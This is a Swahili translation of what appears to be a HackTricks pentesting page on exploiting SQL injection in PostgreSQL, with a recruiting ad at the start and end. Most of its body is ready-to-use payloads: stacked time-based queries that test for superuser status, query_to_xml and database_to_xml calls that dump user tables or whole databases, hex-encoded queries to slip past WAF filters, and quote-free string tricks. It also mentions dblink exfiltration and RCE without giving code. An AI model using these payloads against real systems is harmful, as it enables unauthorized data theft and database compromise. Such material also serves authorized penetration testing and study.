Ikiwa una nia ya kazi ya kudukua na kudukua yasiyodukuliwa - tunakupa kazi! (inahitajika uwezo wa kuandika na kuzungumza Kipolishi kwa ufasaha).

Ukurasa huu unalenga kueleza mbinu tofauti ambazo zinaweza kukusaidia kudukua SQLinjection iliyopatikana kwenye database ya postgresql na kuzipatia mbinu unazoweza kupata kwenye https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md

Mwingiliano wa Mtandao - Kupandisha Hadhi, Skana ya Bandari, Ufunuo wa Majibu ya Changamoto ya NTLM & Uchukuzi

Moduli ya PostgreSQL dblink inatoa uwezo wa kuunganisha kwenye mifano mingine ya PostgreSQL na kutekeleza uhusiano wa TCP. Vipengele hivi, vikiunganishwa na utendaji wa COPY FROM, kuruhusu hatua kama kupandisha hadhi, skanning ya bandari, na kukamata majibu ya changamoto ya NTLM. Kwa njia za kina za kutekeleza mashambulizi haya angalia jinsi ya kutekeleza mashambulizi haya.

Mfano wa Uchukuzi ukitumia dblink na vitu vikubwa

Unaweza kusoma mfano huu kuona mfano wa CTF wa jinsi ya kupakia data ndani ya vitu vikubwa kisha kuchukua yaliyomo ya vitu vikubwa ndani ya jina la mtumiaji wa kazi dblink_connect.

Mashambulizi ya PostgreSQL: Kusoma/kuandika, RCE, kupandisha hadhi

Angalia jinsi ya kudhoofisha mwenyeji na kupandisha hadhi kutoka PostgreSQL katika:

Kupitisha WAF

Vipengele vya String vya PostgreSQL

Kubadilisha strings inaweza kukusaidia kupitisha WAFs au vizuizi vingine. Kwenye ukurasa huu unaweza kupata baadhi ya Vipengele muhimu vya Strings.

Mipangilio Iliyopangwa

Kumbuka kwamba postgresql inasaidia mipangilio iliyopangwa, lakini programu kadhaa zitatoa kosa ikiwa majibu 2 yatarudi wakati wa kutarajia 1 tu. Lakini, bado unaweza kutumia vibaya mipangilio iliyopangwa kupitia Kuingiza Wakati:

id=1; select pg_sleep(10);-- -
1; SELECT case when (SELECT current_setting('is_superuser'))='on' then pg_sleep(10) end;-- -

Mbinu za XML

query_to_xml

Hii kazi itarudisha data yote katika muundo wa XML katika faili moja tu. Ni bora ikiwa unataka kudump data nyingi katika safu moja tu:

SELECT query_to_xml('select * from pg_user',true,true,'');

database_to_xml

Hii function itadump database nzima kwa muundo wa XML katika safu 1 tu (kuwa makini ikiwa database ni kubwa sana kwani unaweza kuisababishia DoS au hata mteja wako mwenyewe):

SELECT database_to_xml(true,true,'');

Strings in Hex

Ikiwa unaweza kutekeleza mambo kwa kuzipitisha ndani ya string (kwa mfano kutumia kazi ya query_to_xml). Unaweza kutumia convert_from kupitisha string kama hex na kuepuka mifumo ya kuchuja njia hii:

select encode('select cast(string_agg(table_name, '','') as int) from information_schema.tables', 'hex'), convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573', 'UTF8');

# Bypass via stacked queries + error based + query_to_xml with hex
;select query_to_xml(convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573','UTF8'),true,true,'')-- -h

# Bypass via boolean + error based + query_to_xml with hex
1 or '1' = (query_to_xml(convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573','UTF8'),true,true,''))::text-- -

Alama za kutumia marufuku

Ikiwa huwezi kutumia alama za nukuu kwa mzigo wako unaweza kuzidisha hili na CHR kwa ajili ya vifungu vya msingi (kuunganisha herufi kazi kwa ajili ya maswali ya msingi kama vile SELECT, INSERT, DELETE, nk. Haifanyi kazi kwa taarifa zote za SQL):

SELECT CHR(65) || CHR(87) || CHR(65) || CHR(69);

Au na $. Hizi kuuliza hurejesha matokeo sawa:

SELECT 'hacktricks';
SELECT $$hacktricks$$;
SELECT $TAG$hacktricks$TAG$;

Ikiwa una nia katika kazi ya udukuzi na kudukua yasiyodukuzika - tunahitaji wafanyakazi! (ujuzi wa Kipolishi wa kuandika na kusema unahitajika).